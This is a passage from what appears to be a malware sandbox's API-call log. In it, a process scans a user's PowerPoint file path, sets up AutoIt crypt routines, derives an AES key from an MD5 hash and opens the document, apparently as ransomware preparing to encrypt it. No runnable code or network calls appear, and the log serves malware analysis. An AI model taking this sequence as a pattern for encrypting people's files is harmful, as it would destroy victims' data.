HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LVw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vw QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QC5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rO32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="32Oh.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.728] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.728] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0173.728] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0173.729] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0173.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0173.729] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0173.729] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0173.729] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0173.729] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0173.729] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.729] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6c9e910, ftCreationTime.dwHighDateTime=0x1d5c7ef, ftLastAccessTime.dwLowDateTime=0x1307fcf0, ftLastAccessTime.dwHighDateTime=0x1d56638, ftLastWriteTime.dwLowDateTime=0x1307fcf0, ftLastWriteTime.dwHighDateTime=0x1d56638, nFileSizeHigh=0x0, nFileSizeLow=0x12a51, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="LVw QC5rO32Oh.pptx", cAlternateFileName="LVWQC5~1.PPT")) returned 0x90ae18 [0173.729] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0173.729] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.729] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0173.729] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.729] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.730] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0173.730] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.730] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0173.730] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.730] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.730] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0173.731] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.731] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.731] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.731] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.731] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.731] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0173.731] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.731] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0173.732] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.732] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.732] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0173.732] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.732] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.732] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.732] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.732] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.732] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0173.733] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.733] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.733] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.733] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.733] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.733] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.733] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0173.733] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.733] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.733] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0173.733] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.733] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.733] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0173.733] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.733] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.733] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0173.733] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.733] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.733] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.733] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.733] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.733] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.734] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.734] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0173.734] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.734] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.734] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0173.734] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.734] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.734] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.734] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.734] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0173.734] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.734] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.734] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.734] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.734] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.734] CryptHashData (hHash=0x90af58, pbData=0x8dee70, dwDataLen=0x19, dwFlags=0x1) returned 1 [0173.734] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.734] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.734] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.735] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.735] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.735] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0173.735] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.735] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.735] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0173.735] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.735] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.735] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.735] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.735] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.735] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.735] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0173.735] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.735] CryptDestroyHash (hHash=0x90af58) returned 1 [0173.735] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.735] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.735] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.735] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.735] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.737] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lvw qc5ro32oh.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0173.737] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.737] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0173.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0173.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0173.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0173.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0173.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0173.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0173.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0173.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0173.737] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0173.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0173.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0173.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0173.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0173.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0173.738] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0173.738] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0173.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0173.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 